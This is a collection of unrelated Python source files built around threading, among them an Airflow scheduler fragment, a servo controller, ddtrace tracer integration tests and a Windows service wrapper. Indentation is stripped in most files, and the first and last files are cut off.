DagRun.dag_id.in_([o.dag_id for o in dag_models]),
DagRun.state == State.RUNNING, # pylint: disable=comparison-with-callable
DagRun.external_trigger.is_(False),
).group_by(DagRun.dag_id).all())
for dag_model in dag_models:
dag = self.dagbag.get_dag(dag_model.dag_id, session=session)
active_runs_of_dag = active_runs_of_dags.get(dag.dag_id, 0)
if dag.max_active_runs and active_runs_of_dag >= dag.max_active_runs:
self.log.info(
"DAG %s is at (or above) max_active_runs (%d of %d), not creating any more runs",
dag.dag_id, active_runs_of_dag, dag.max_active_runs
)
dag_model.next_dagrun_create_after = None
else:
dag_model.next_dagrun, dag_model.next_dagrun_create_after = \
dag.next_dagrun_info(dag_model.next_dagrun)
def _schedule_dag_run(self, dag_run: DagRun, currently_active_runs: int, session: Session) -> int:
"""
Make scheduling decisions about an individual dag run
``currently_active_runs`` is passed in so that a batch query can be
used to ask this for all dag runs in the batch, to avoid an n+1 query.
:param dag_run: The DagRun to schedule
:param currently_active_runs: Number of currently active runs of this DAG
:return: Number of tasks scheduled
"""
dag = dag_run.dag = self.dagbag.get_dag(dag_run.dag_id, session=session)
if not dag:
self.log.error(
"Couldn't find dag %s in DagBag/DB!", dag_run.dag_id
)
return 0
if (
dag_run.start_date and dag.dagrun_timeout and
dag_run.start_date < timezone.utcnow() - dag.dagrun_timeout
):
dag_run.state = State.FAILED
dag_run.end_date = timezone.utcnow()
self.log.info("Run %s of %s has timed-out", dag_run.run_id, dag_run.dag_id)
session.flush()
# Work out if we should allow creating a new DagRun now?
self._update_dag_next_dagruns([session.query(DagModel).get(dag_run.dag_id)], session)
callback_to_execute = DagCallbackRequest(
full_filepath=dag.fileloc,
dag_id=dag.dag_id,
execution_date=dag_run.execution_date,
is_failure_callback=True,
msg='timed_out'
)
# Send SLA & DAG Success/Failure Callbacks to be executed
self._send_dag_callbacks_to_processor(dag_run, callback_to_execute)
return 0
if dag_run.execution_date > timezone.utcnow() and not dag.allow_future_exec_dates:
self.log.error(
"Execution date is in future: %s",
dag_run.execution_date
)
return 0
if dag.max_active_runs:
if currently_active_runs >= dag.max_active_runs:
self.log.info(
"DAG %s already has %d active runs, not queuing any more tasks",
dag.dag_id,
currently_active_runs,
)
return 0
self._verify_integrity_if_dag_changed(dag_run=dag_run, session=session)
# TODO[HA]: Rename update_state -> schedule_dag_run, ?? something else?
schedulable_tis, callback_to_run = dag_run.update_state(session=session, execute_callbacks=False)
self._send_dag_callbacks_to_processor(dag_run, callback_to_run)
# Get the list of TIs that do not need to be executed; these are
# tasks using DummyOperator and without on_execute_callback / on_success_callback
dummy_tis = [
ti for ti in schedulable_tis
if
(
ti.task.task_type == "DummyOperator"
and not ti.task.on_execute_callback
and not ti.task.on_success_callback
)
]
# This will do one query per dag run. We "could" build up a complex
# query to update all the TIs across all the execution dates and dag
# IDs in a single query, but it turns out that can be _very very slow_
# see #11147/commit ee90807ac for more details
count = session.query(TI).filter(
TI.dag_id == dag_run.dag_id,
TI.execution_date == dag_run.execution_date,
TI.task_id.in_(ti.task_id for ti in schedulable_tis if ti not in dummy_tis)
).update({TI.state: State.SCHEDULED}, synchronize_session=False)
# Tasks using DummyOperator should not be executed, mark them as success
if dummy_tis:
session.query(TI).filter(
TI.dag_id == dag_run.dag_id,
TI.execution_date == dag_run.execution_date,
TI.task_id.in_(ti.task_id for ti in dummy_tis)
).update({
TI.state: State.SUCCESS,
TI.start_date: timezone.utcnow(),
TI.end_date: timezone.utcnow(),
TI.duration: 0
}, synchronize_session=False)
return count
@provide_session
def _verify_integrity_if_dag_changed(self, dag_run: DagRun, session=None):
"""Only run DagRun.verify integrity if Serialized DAG has changed since it is slow"""
latest_version = SerializedDagModel.get_latest_version_hash(dag_run.dag_id, session=session)
if dag_run.dag_hash == latest_version:
self.log.debug("DAG %s not changed structure, skipping dagrun.verify_integrity", dag_run.dag_id)
return
dag_run.dag_hash = latest_version
# Refresh the DAG
dag_run.dag = self.dagbag.get_dag(dag_id=dag_run.dag_id, session=session)
# Verify integrity also takes care of session.flush
dag_run.verify_integrity(session=session)
def _send_dag_callbacks_to_processor(
self,
dag_run: DagRun,
callback: Optional[DagCallbackRequest] = None
):
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
dag = dag_run.get_dag()
self._send_sla_callbacks_to_processor(dag)
if callback:
self.processor_agent.send_callback_to_execute(callback)
def _send_sla_callbacks_to_processor(self, dag: DAG):
"""Sends SLA Callbacks to DagFileProcessor if tasks have SLAs set and check_slas=True"""
if not settings.CHECK_SLAS:
return
if not any(isinstance(ti.sla, timedelta) for ti in dag.tasks):
self.log.debug("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
self.processor_agent.send_sla_callback_request_to_execute(
full_filepath=dag.fileloc,
dag_id=dag.dag_id
)
@provide_session
def _emit_pool_metrics(self, session: Session = None) -> None:
pools = models.Pool.slots_stats(session=session)
for pool_name, slot_stats in pools.items():
Stats.gauge(f'pool.open_slots.{pool_name}', slot_stats["open"])
Stats.gauge(f'pool.queued_slots.{pool_name}', slot_stats[State.QUEUED])
Stats.gauge(f'pool.running_slots.{pool_name}', slot_stats[State.RUNNING])
@provide_session
def heartbeat_callback(self, session: Session = None) -> None:
Stats.incr('scheduler_heartbeat', 1, 1)
@provide_session
def adopt_or_reset_orphaned_tasks(self, session: Session = None):
"""
Reset any TaskInstance still in QUEUED or SCHEDULED states that were
enqueued by a SchedulerJob that is no longer running.
:return: the number of TIs reset
:rtype: int
"""
timeout = conf.getint('scheduler', 'scheduler_health_check_threshold')
num_failed = session.query(SchedulerJob).filter(
SchedulerJob.state == State.RUNNING,
SchedulerJob.latest_heartbeat < (timezone.utcnow() - timedelta(seconds=timeout))
).update({"state": State.FAILED})
if num_failed:
self.log.info("Marked %d SchedulerJob instances as failed", num_failed)
Stats.incr(self.__class__.__name__.lower() + '_end', num_failed)
resettable_states = [State.SCHEDULED, State.QUEUED, State.RUNNING]
query = (
session.query(TI).filter(TI.state.in_(resettable_states))
# outerjoin is because we didn't always have queued_by_job_id
# set, so we need to pick up anything pre-upgrade. This (and the
# "or queued_by_job_id IS NULL") can go as soon as scheduler HA is
# released.
.outerjoin(TI.queued_by_job)
.filter(or_(TI.queued_by_job_id.is_(None), SchedulerJob.state != State.RUNNING))
.join(TI.dag_run)
.filter(DagRun.run_type != DagRunType.BACKFILL_JOB,
# pylint: disable=comparison-with-callable
DagRun.state == State.RUNNING)
.options(load_only(TI.dag_id, TI.task_id, TI.execution_date))
)
# Lock these rows, so that another scheduler can't try and adopt these too
tis_to_reset_or_adopt = with_row_locks(query, of=TI, **skip_locked(session=session)).all()
to_reset = self.executor.try_adopt_task_instances(tis_to_reset_or_adopt)
reset_tis_message = []
for ti in to_reset:
reset_tis_message.append(repr(ti))
ti.state = State.NONE
ti.queued_by_job_id = None
for ti in set(tis_to_reset_or_adopt) - set(to_reset):
ti.queued_by_job_id = self.id
Stats.incr('scheduler.orphaned_tasks.cleared', len(to_reset))
Stats.incr('scheduler.orphaned_tasks.adopted', len(tis_to_reset_or_adopt) - len(to_reset))
if to_reset:
task_instance_str = '\n\t'.join(reset_tis_message)
self.log.info("Reset the following %s orphaned TaskInstances:\n\t%s",
len(to_reset), task_instance_str)
# Issue SQL/finish "Unit of Work", but let @provide_session commit (or if passed a session, let caller
# decide when to commit
session.flush()
return len(to_reset)
|
PWMServoClass.py
|
#!/usr/bin/python3
# encoding: utf-8
# Copyright HiWonder.hk
# Further development by ians.moyes@gmail.com
# Translation by Google
# Class to control the PWM Servo
import threading # Standard multi-tasking library
import time # Standard date & time library
class PWM_Servo(object): # Class to define & control a PWM Servo
# PWM servo parameters
servo_type = "generic" # Manufacturer/model of the servo
rotate_limits = (500, 2500) # Minimum & maximum pulse widths (microseconds) for full deflection
time_limits = (20, 5000) # Minimum & maximum time to reach destination
offset_limits = (-300, 300) # Minimum & maximum offset values
PWMfreq = 50 # PWM frequency
stepTime = 20 # Time for an iteration step, in milliseconds
default_pos = 1500 # The default position for straight ahead
def __init__(self, pi, pin, freq=PWMfreq, min_width=rotate_limits[0], max_width=rotate_limits[1], offset=0, control_speed=False):
self.pi = pi # Attach the servo to the Raspberry Pi
self.SPin = pin # Channel to control servo. The GPIO pin in our case
self.Position = PWM_Servo.default_pos # The current position, initially the straight-ahead position
self.positionSet = self.Position # The next position to move to
self.Freq = freq # The PWM carrier frequency
self.Min = min_width # Minimum PWM pulses for full deflection
self.Max = max_width # Maximum PWM pulses for full deflection
self.Offset = offset # Calibration offset
self.Mintime = PWM_Servo.time_limits[0] # Minimum time to destination
self.Maxtime = PWM_Servo.time_limits[1] # Maximum time to destination
self.stepTime = PWM_Servo.stepTime # Time for an iteration step, in milliseconds
self.positionInc = 0.0 # How many pulses to move in a step
self.Time = 0 # Time duration of the movement
self.incTimes = 1 # How many time steps to reach destination
self.prev = time.time() # Placeholder for pause time stamp
self.speedControl = control_speed # Whether speed control is required
self.pi.set_PWM_range(self.SPin, int(1000000 / self.Freq)) # Range of values for duty cycle
self.pi.set_PWM_frequency(self.SPin, self.Freq) # Set PWM carrier frequency
self.pi.set_PWM_dutycycle(self.SPin, self.Position + self.Offset) # Initialise position
if self.speedControl is True: # If speed control is required start a multi-tasking thread
t1 = threading.Thread(target=PWM_Servo.updatePosition, args=(self,))
t1.setDaemon(True)
t1.start()
def setPosition(self, pos, tim=0): # Move the servo
if pos < self.Min or pos > self.Max: # Validate the position value
print("Invalid position value " + str(pos))
return "pos"
self.positionSet = pos # Set the next position flag
if not self.speedControl: tim = 0 # If speed control is not required
if tim == 0:
self.Position = pos # Update the current position
self.pi.set_PWM_dutycycle(self.SPin, self.Position + self.Offset) # Move the servo
else:
if tim < self.Mintime: # Clamp manually rather than with max()/min(); it's faster
self.Time = self.Mintime # Clamp the time to the limits
elif tim > self.Maxtime:
self.Time = self.Maxtime
else:
self.Time = tim
# The multi-tasking thread will pick up that the current position doesn't match the
# desired position & activate
return True
def updatePosition(self): # This is the code for the multi-tasking thread
while True: # If speed control is required
if self.Position != self.positionSet: # If the desired position is not the current position
self.incTimes = int(self.Time / self.stepTime)
if self.incTimes == 0: self.incTimes = 1
# The number of steps is time-to-destination / time-for-a-step
self.positionInc = int((self.positionSet - self.Position) / self.incTimes)
# Pulses per step
for i in range (self.incTimes): # Loop to add a step increment each iteration
self.prev = time.time() # To the current position
self.Position += self.positionInc
self.pi.set_PWM_dutycycle(self.SPin, self.Position + self.Offset) # Move the servo
time.sleep(max(0, 0.02 - (time.time() - self.prev))) # Work out the pause
self.Time = self.Mintime # Set the duration to the minimum to mop up the error
if __name__ == '__main__':
import pigpio # Standard Raspberry Pi GPIO library
pi = pigpio.pi() # Create a Raspberry Pi object
pan = PWM_Servo(pi, 5, min_width=800, max_width=2200, offset=0) #, control_speed=True)
tilt = PWM_Servo(pi, 6, min_width=1200, max_width=2000, offset=0) # , control_speed=True)
tilt.setPosition(tilt.default_pos)
pan.setPosition(pan.default_pos)
print("Middle Middle")
time.sleep(1)
tilt.setPosition(tilt.Min, 500) # Full down
print("Middle Down")
time.sleep(1)
tilt.setPosition(tilt.Max, 500) # Full up
print("Middle Up")
time.sleep(1)
tilt.setPosition(tilt.default_pos, 500)
print("Middle Middle")
time.sleep(1)
pan.setPosition(pan.Min, 500) # Full right
print("Right Middle")
time.sleep(1)
pan.setPosition(pan.Max, 500) # Full left
print("Left Middle")
time.sleep(1)
print("Middle Middle")
pan.setPosition(pan.default_pos, 500)
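# Because __init__ sets the PWM range to 1,000,000 / freq (20,000 at 50 Hz), a
# duty-cycle value passed to set_PWM_dutycycle equals the pulse width in
# microseconds. A small, hedged helper for converting an angle to such a pulse
# width is sketched below; the 180-degree travel and the helper name are
# illustrative assumptions, not part of the original class.
def angle_to_pulse(angle, min_width=500, max_width=2500, travel_deg=180.0):
    """Convert an angle in degrees (0..travel_deg) to a pulse width in microseconds."""
    angle = max(0.0, min(float(angle), travel_deg))  # clamp to the servo's travel
    return int(min_width + (max_width - min_width) * angle / travel_deg)
# Hypothetical usage: pan.setPosition(angle_to_pulse(90))  # roughly centred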
|
test.py
|
#!/usr/bin/env python3
import time
import threading
def looper():
counter = 0
while True:
counter += 1
print(f'loop: {counter}')
time.sleep(1)
loop = threading.Thread(target=looper)
loop.start()
import asyncio
import websockets
import json
async def recv_event(socket, event_type):
# Keep receiving (and decoding) messages until one of the requested type arrives.
response = None
response_type = None
while response_type != event_type:
response = json.loads(await socket.recv())
response_type = response["type"]
return response
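# Hypothetical usage of the helper above (it is not called in test() below):
#   joined = await recv_event(websocket, "joined")
#   print(joined["username"])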
async def test():
async with websockets.connect("ws://localhost:8001") as websocket:
await websocket.send(json.dumps({
"type": "join",
"username": input('Username: ')
}))
response = json.loads(await websocket.recv())
uid = response["uid"]
is_host = response["host"]
while True:
if is_host:
choice = input("action? (0 see players, 1 start) ")
if choice == "0":
await websocket.send(json.dumps({
"type": "list"
}))
response = json.loads(await websocket.recv())
[print(player) for player in response["data"]]
else:
event = json.loads(await websocket.recv())
if event["type"] == "joined":
print(f"New player joined: {event['username']}")
main = threading.Thread(target=lambda: asyncio.run(test()))
main.start()
loop.join()
main.join()
|
svc.py
|
# -*- coding: utf-8 -*-
import sys
from SimpleXMLRPCServer import SimpleXMLRPCServer
import win32serviceutil
import win32service
import win32event
import threading
from silvercomics import ComicsApp
from flup.server.fcgi import WSGIServer
def runserver():
# Keep the web app alive for the lifetime of the service: if it ever
# crashes, swallow the error and start it again.
while True:
try:
ComicsApp.run(port=9000)
# WSGIServer(ComicsApp()).run()
except Exception:
pass
class SilverComicsWebService(win32serviceutil.ServiceFramework):
_svc_name_ = "SilverComicsService"
_svc_display_name_ = "Silver Age Comics Web Service"
def __init__(self, args):
win32serviceutil.ServiceFramework.__init__(self, args)
# Create an event which we will use to wait on.
# The "service stop" request will set this event.
self.hWaitStop = win32event.CreateEvent(None, 0, 0, None)
def SvcStop(self):
# Before we do anything, tell the SCM we are starting the stop process.
self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)
# And set my event.
win32event.SetEvent(self.hWaitStop)
def SvcDoRun(self):
# We do nothing other than wait to be stopped!
server = threading.Thread(target = runserver, name="silvercomicsservice")
server.daemon = True
server.start()
win32event.WaitForSingleObject(self.hWaitStop, win32event.INFINITE)
if __name__=='__main__':
win32serviceutil.HandleCommandLine(SilverComicsWebService)
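# HandleCommandLine wires up the standard pywin32 service commands, e.g.:
#   python svc.py install   # register the service with the SCM
#   python svc.py start     # start it
#   python svc.py stop      # stop it
#   python svc.py remove    # unregister it
#   python svc.py debug     # run it in the foreground for troubleshooting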
|
tonegenerator_multithreading.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import threading
import time
import queue
from softtone import SofttoneGenerator
class ToneGeneratorThread(object):
def __init__(self):
self.queue = queue.Queue()
self.generator = SofttoneGenerator()
self.thread = threading.Thread(name='ToneGenerator', target=self.run, daemon=True)
self.thread.start()
def _add(self, item):
self.queue.put(item)
def run(self):
while True:
if not self.queue.empty():
item = self.queue.get_nowait()
meth = getattr(self.generator, item)
meth()
time.sleep(0.2)
def confirm(self):
self._add("confirm")
def abort(self):
self._add("abort")
def ready(self):
self._add("ready")
|
test_integration.py
|
import mock
import os
import subprocess
import sys
import pytest
from ddtrace.vendor import six
import ddtrace
from ddtrace import Tracer, tracer
from ddtrace.internal.writer import AgentWriter
from ddtrace.internal.runtime import container
from tests import TracerTestCase, snapshot, AnyInt, override_global_config
AGENT_VERSION = os.environ.get("AGENT_VERSION")
def test_configure_keeps_api_hostname_and_port():
"""
Ensures that when calling configure without specifying hostname and port,
previous overrides have been kept.
"""
tracer = Tracer()
assert tracer.writer._hostname == "localhost"
assert tracer.writer._port == 8126
tracer.configure(hostname="127.0.0.1", port=8127)
assert tracer.writer._hostname == "127.0.0.1"
assert tracer.writer._port == 8127
tracer.configure(priority_sampling=True)
assert tracer.writer._hostname == "127.0.0.1"
assert tracer.writer._port == 8127
def test_debug_mode():
p = subprocess.Popen(
[sys.executable, "-c", "import ddtrace"],
env=dict(),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
p.wait()
assert p.stdout.read() == b""
assert b"DEBUG:ddtrace" not in p.stderr.read()
p = subprocess.Popen(
[sys.executable, "-c", "import ddtrace"],
env=dict(DD_TRACE_DEBUG="true"),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
p.wait()
assert p.stdout.read() == b""
# Stderr should have some debug lines
assert b"DEBUG:ddtrace" in p.stderr.read()
def test_output(tmpdir):
f = tmpdir.join("test.py")
f.write(
"""
import ddtrace
""".lstrip()
)
p = subprocess.Popen(
["ddtrace-run", sys.executable, "test.py"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=str(tmpdir),
)
p.wait()
assert p.stderr.read() == six.b("")
assert p.stdout.read() == six.b("")
assert p.returncode == 0
def test_start_in_thread(tmpdir):
f = tmpdir.join("test.py")
f.write(
"""
import threading
def target():
import ddtrace
t = threading.Thread(target=target)
t.start()
t.join()
""".lstrip()
)
p = subprocess.Popen(
["ddtrace-run", sys.executable, "test.py"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=str(tmpdir),
)
p.wait()
assert p.stderr.read() == six.b("")
assert p.stdout.read() == six.b("")
assert p.returncode == 0
@pytest.mark.skipif(AGENT_VERSION != "latest", reason="Agent v5 doesn't support UDS")
def test_single_trace_uds():
t = Tracer()
sockdir = "/tmp/ddagent/trace.sock"
t.configure(uds_path=sockdir)
with mock.patch("ddtrace.internal.writer.log") as log:
t.trace("client.testing").finish()
t.shutdown()
log.warning.assert_not_called()
log.error.assert_not_called()
def test_uds_wrong_socket_path():
t = Tracer()
t.configure(uds_path="/tmp/ddagent/nosockethere")
with mock.patch("ddtrace.internal.writer.log") as log:
t.trace("client.testing").finish()
t.shutdown()
calls = [
mock.call("failed to send traces to Datadog Agent at %s", "unix:///tmp/ddagent/nosockethere", exc_info=True)
]
log.error.assert_has_calls(calls)
@pytest.mark.skipif(AGENT_VERSION == "testagent", reason="FIXME: Test agent doesn't support this for some reason.")
def test_payload_too_large():
t = Tracer()
# Make sure a flush doesn't happen partway through.
t.configure(writer=AgentWriter(processing_interval=1000))
with mock.patch("ddtrace.internal.writer.log") as log:
for i in range(100000):
with t.trace("operation") as s:
s.set_tag(str(i), "b" * 190)
s.set_tag(str(i), "a" * 190)
t.shutdown()
calls = [
mock.call(
"trace buffer (%s traces %db/%db) cannot fit trace of size %db, dropping",
AnyInt(),
AnyInt(),
AnyInt(),
AnyInt(),
)
]
log.warning.assert_has_calls(calls)
log.error.assert_not_called()
def test_large_payload():
t = Tracer()
# Traces are approx. 275 bytes.
# 10,000*275 ~ 3MB
with mock.patch("ddtrace.internal.writer.log") as log:
for i in range(10000):
with t.trace("operation"):
pass
t.shutdown()
log.warning.assert_not_called()
log.error.assert_not_called()
def test_child_spans():
t = Tracer()
with mock.patch("ddtrace.internal.writer.log") as log:
spans = []
for i in range(10000):
spans.append(t.trace("op"))
for s in spans:
s.finish()
t.shutdown()
log.warning.assert_not_called()
log.error.assert_not_called()
def test_metrics():
with override_global_config(dict(health_metrics_enabled=True)):
t = Tracer()
statsd_mock = mock.Mock()
t.writer.dogstatsd = statsd_mock
assert t.writer._report_metrics
with mock.patch("ddtrace.internal.writer.log") as log:
for _ in range(5):
spans = []
for i in range(3000):
spans.append(t.trace("op"))
for s in spans:
s.finish()
t.shutdown()
log.warning.assert_not_called()
log.error.assert_not_called()
statsd_mock.increment.assert_has_calls(
[
mock.call("datadog.tracer.http.requests"),
]
)
statsd_mock.distribution.assert_has_calls(
[
mock.call("datadog.tracer.buffer.accepted.traces", 5, tags=[]),
mock.call("datadog.tracer.buffer.accepted.spans", 15000, tags=[]),
mock.call("datadog.tracer.http.requests", 1, tags=[]),
mock.call("datadog.tracer.http.sent.bytes", AnyInt()),
],
any_order=True,
)
def test_single_trace_too_large():
t = Tracer()
with mock.patch("ddtrace.internal.writer.log") as log:
with t.trace("huge"):
for i in range(100000):
with tracer.trace("operation") as s:
s.set_tag("a" * 10, "b" * 10)
t.shutdown()
calls = [mock.call("trace (%db) larger than payload limit (%db), dropping", AnyInt(), AnyInt())]
log.warning.assert_has_calls(calls)
log.error.assert_not_called()
def test_trace_bad_url():
t = Tracer()
t.configure(hostname="bad", port=1111)
with mock.patch("ddtrace.internal.writer.log") as log:
with t.trace("op"):
pass
t.shutdown()
calls = [mock.call("failed to send traces to Datadog Agent at %s", "http://bad:1111", exc_info=True)]
log.error.assert_has_calls(calls)
def test_writer_headers():
t = Tracer()
t.writer._put = mock.Mock(wraps=t.writer._put)
with t.trace("op"):
pass
t.shutdown()
assert t.writer._put.call_count == 1
_, headers = t.writer._put.call_args[0]
assert headers.get("Datadog-Meta-Tracer-Version") == ddtrace.__version__
assert headers.get("Datadog-Meta-Lang") == "python"
assert headers.get("Content-Type") == "application/msgpack"
assert headers.get("X-Datadog-Trace-Count") == "1"
if container.get_container_info():
assert "Datadog-Container-Id" in headers
t = Tracer()
t.writer._put = mock.Mock(wraps=t.writer._put)
for _ in range(100):
with t.trace("op"):
pass
t.shutdown()
assert t.writer._put.call_count == 1
_, headers = t.writer._put.call_args[0]
assert headers.get("X-Datadog-Trace-Count") == "100"
t = Tracer()
t.writer._put = mock.Mock(wraps=t.writer._put)
for _ in range(10):
with t.trace("op"):
for _ in range(5):
t.trace("child").finish()
t.shutdown()
assert t.writer._put.call_count == 1
_, headers = t.writer._put.call_args[0]
assert headers.get("X-Datadog-Trace-Count") == "10"
@pytest.mark.skipif(AGENT_VERSION == "testagent", reason="Test agent doesn't support priority sampling responses.")
def test_priority_sampling_response():
# Send the data once because the agent doesn't respond with them on the
# first payload.
t = Tracer()
s = t.trace("operation", service="my-svc")
s.set_tag("env", "my-env")
s.finish()
assert "service:my-svc,env:my-env" not in t.writer._priority_sampler._by_service_samplers
t.shutdown()
# For some reason the agent doesn't start returning the service information
# immediately
import time
time.sleep(5)
t = Tracer()
s = t.trace("operation", service="my-svc")
s.set_tag("env", "my-env")
s.finish()
assert "service:my-svc,env:my-env" not in t.writer._priority_sampler._by_service_samplers
t.shutdown()
assert "service:my-svc,env:my-env" in t.writer._priority_sampler._by_service_samplers
def test_bad_endpoint():
t = Tracer()
t.writer._endpoint = "/bad"
with mock.patch("ddtrace.internal.writer.log") as log:
s = t.trace("operation", service="my-svc")
s.set_tag("env", "my-env")
s.finish()
t.shutdown()
calls = [mock.call("unsupported endpoint '%s': received response %s from Datadog Agent", "/bad", 404)]
log.error.assert_has_calls(calls)
@pytest.mark.skipif(AGENT_VERSION == "testagent", reason="FIXME: Test agent response is different.")
def test_bad_payload():
t = Tracer()
class BadEncoder:
def encode_trace(self, spans):
return []
def join_encoded(self, traces):
return "not msgpack"
t.writer._encoder = BadEncoder()
with mock.patch("ddtrace.internal.writer.log") as log:
t.trace("asdf").finish()
t.shutdown()
calls = [
mock.call(
"failed to send traces to Datadog Agent at %s: HTTP error status %s, reason %s",
"http://localhost:8126",
400,
"Bad Request",
)
]
log.error.assert_has_calls(calls)
@pytest.mark.skipif(AGENT_VERSION == "testagent", reason="Test agent doesn't support v0.3")
def test_downgrade():
t = Tracer()
t.writer._downgrade(None, None)
assert t.writer._endpoint == "/v0.3/traces"
with mock.patch("ddtrace.internal.writer.log") as log:
s = t.trace("operation", service="my-svc")
s.finish()
t.shutdown()
log.warning.assert_not_called()
log.error.assert_not_called()
def test_span_tags():
t = Tracer()
with mock.patch("ddtrace.internal.writer.log") as log:
s = t.trace("operation", service="my-svc")
s.set_tag("env", "my-env")
s.set_metric("number", 123)
s.set_metric("number", 12.0)
s.set_metric("number", "1")
s.finish()
t.shutdown()
log.warning.assert_not_called()
log.error.assert_not_called()
@pytest.mark.skipif(AGENT_VERSION != "testagent", reason="Tests only compatible with a testagent")
class TestTraces(TracerTestCase):
"""
These snapshot tests ensure that trace payloads are being sent as expected.
"""
@snapshot(include_tracer=True)
def test_single_trace_single_span(self, tracer):
s = tracer.trace("operation", service="my-svc")
s.set_tag("k", "v")
# numeric tag
s.set_tag("num", 1234)
s.set_metric("float_metric", 12.34)
s.set_metric("int_metric", 4321)
s.finish()
tracer.shutdown()
@snapshot(include_tracer=True)
def test_multiple_traces(self, tracer):
with tracer.trace("operation1", service="my-svc") as s:
s.set_tag("k", "v")
s.set_tag("num", 1234)
s.set_metric("float_metric", 12.34)
s.set_metric("int_metric", 4321)
tracer.trace("child").finish()
with tracer.trace("operation2", service="my-svc") as s:
s.set_tag("k", "v")
s.set_tag("num", 1234)
s.set_metric("float_metric", 12.34)
s.set_metric("int_metric", 4321)
tracer.trace("child").finish()
tracer.shutdown()
@snapshot(include_tracer=True)
def test_filters(self, tracer):
class FilterMutate(object):
def __init__(self, key, value):
self.key = key
self.value = value
def process_trace(self, trace):
for s in trace:
s.set_tag(self.key, self.value)
return trace
tracer.configure(
settings={
"FILTERS": [FilterMutate("boop", "beep")],
}
)
with tracer.trace("root"):
with tracer.trace("child"):
pass
tracer.shutdown()
|
ParaphraseThreadState.py
|
# -*- coding: utf-8 -*-
"""
Created on Thu Sep 8 14:29:56 2016
@author: neerbek
"""
from threading import Thread
from threading import Lock
import queue
import time
NO_BLOCK = False
class ParaphraseThreadState:
def __init__(self):
self.threads = {}
self.threads_done = queue.Queue()
self.work = queue.Queue()
self.completed_work = queue.Queue()
self.failed_work = queue.Queue()
def add_thread(self, tname, thread): #to be called from main before threads starting
self.threads[tname] = thread
def start_threads(self):
for t in self.threads.values():
t.start()
def thread_done(self, thread_name):
self.threads_done.put(thread_name)
def is_all_threads_done(self):
return self.threads_done.qsize()==len(self.threads)
def put_work(self, w):
return self.work.put(w) # may block
def get_work(self):
return self.work.get(NO_BLOCK) # may throw Queue.Empty
def remaining_work(self):
return self.work.qsize()
def has_more_work(self):
return not self.work.empty()
def work_done(self, w):
self.completed_work.put(w)
def work_failed(self, w):
self.failed_work.put(w)
class ThreadContainer:
def __init__(self, name, state, myparent):
self.name = name
self.state = state
self.t = None
self.mutex = Lock()
self.stop_signal = False
self.the_log = []
self.current_work = None
self.myparent = myparent
def log(self, msg):
with self.mutex:
self.the_log.append(msg)
def get_log(self):
res = []
with self.mutex:
res.extend(self.the_log)
return res
def do_stop(self):
with self.mutex:
self.stop_signal = True
def is_stop(self):
with self.mutex:
return self.stop_signal
def loop_work(self, work): #may be extended by subclasses
self.myparent.run(work)
def get_work(self): #may be extended by subclasses
return self.state.get_work()
def run_internal(self):
work = None
while True: # loop until the work queue is empty and do_stop() has been called
try:
work = self.myparent.get_work()
except queue.Empty:
if self.is_stop():
print(self.name + " is stopping")
break
time.sleep(1)
continue
self.current_work = work
error_msg = None
try:
self.loop_work(work)
except Exception as e:
error_msg = "Exception in " + self.name + " {}".format(e)
except:
error_msg = "General error in " + self.name
if error_msg is None:
self.state.work_done(self.current_work)
else:
self.state.work_failed(self.current_work)
print(error_msg)
self.log(error_msg)
self.current_work = None
self.state.thread_done(self)
#static
def run_static(this):
this.run_internal()
def start(self):
self.t = Thread(target=self.run_internal, args=() )
self.t.start()
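# Hedged usage sketch (not part of the original module): a minimal "parent"
# supplying get_work()/run(), two worker containers draining a shared work
# queue, and a clean stop once the queue is empty.
if __name__ == "__main__":
    class EchoParent:
        def __init__(self, state):
            self.state = state
        def get_work(self):
            return self.state.get_work()
        def run(self, work):
            print("processed", work)

    state = ParaphraseThreadState()
    for i in range(5):
        state.put_work(i)
    for name in ("worker-1", "worker-2"):
        state.add_thread(name, ThreadContainer(name, state, EchoParent(state)))
    state.start_threads()
    while state.has_more_work():
        time.sleep(0.1)
    for container in state.threads.values():
        container.do_stop()
    while not state.is_all_threads_done():
        time.sleep(0.1)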
|
main_example.py
|
import signal
from threading import Thread
from PyQt5.QtWidgets import QMainWindow
import pglive.examples_pyqt5 as examples
from pglive.examples_pyqt5.designer_example.win_template import Ui_MainWindow
from pglive.sources.data_connector import DataConnector
from pglive.sources.live_plot import LiveLinePlot
class MainWindow(QMainWindow, Ui_MainWindow):
"""Create main window from template"""
def __init__(self, parent=None):
super().__init__(parent)
self.setupUi(self)
win = MainWindow()
plot = LiveLinePlot()
data_connector = DataConnector(plot, max_points=600)
win.plot_widget.addItem(plot)
Thread(target=examples.sin_wave_generator, args=(data_connector,)).start()
signal.signal(signal.SIGINT, lambda sig, frame: examples.stop())
win.show()
examples.app.exec()
examples.stop()
|
queue.py
|
# coding: utf-8
from copy import copy
from .utils import TargetRepeatingThread
from .node import nodes
from .log import get_logger
log = get_logger(__name__)
class SessionQueue(list):
def enqueue(self, dc):
delayed_session = DelayedSession(dc)
self.append(delayed_session)
return delayed_session
class DelayedSession(object):
def __init__(self, dc):
self.dc = dc
self.node = None
def to_json(self):
return self.dc
class SessionQueueWorker(object):
def __init__(self, queue=None):
if queue is None:
queue = SessionQueue()
self.queue = queue
self.worker = TargetRepeatingThread(target=self.work)
self.worker.start()
def stop(self):
self.worker.stop()
self.worker.join()
log.info("Session Queue Worker stopped")
def work(self):
for session in copy(self.queue):
node = nodes.get_node_by_dc(session.dc)
if node:
session.node = node
self.queue.remove(session)
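# Hedged usage sketch (behaviour of TargetRepeatingThread and
# nodes.get_node_by_dc is assumed from their names):
#   worker = SessionQueueWorker()
#   delayed = worker.queue.enqueue({"browserName": "chrome"})  # hypothetical desired capabilities
#   # ... once a matching node is available, the worker sets delayed.node
#   # and removes the session from the queue ...
#   worker.stop()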
|
__init__.py
|
'''
PyMOL Molecular Graphics System
Copyright (c) Schrodinger, Inc.
Supported ways to launch PyMOL:
If $PYMOL_PATH is a non-default location, it must be set and exported
before launching PyMOL.
From a terminal:
shell> python /path/to/pymol/__init__.py [args]
From a python main thread:
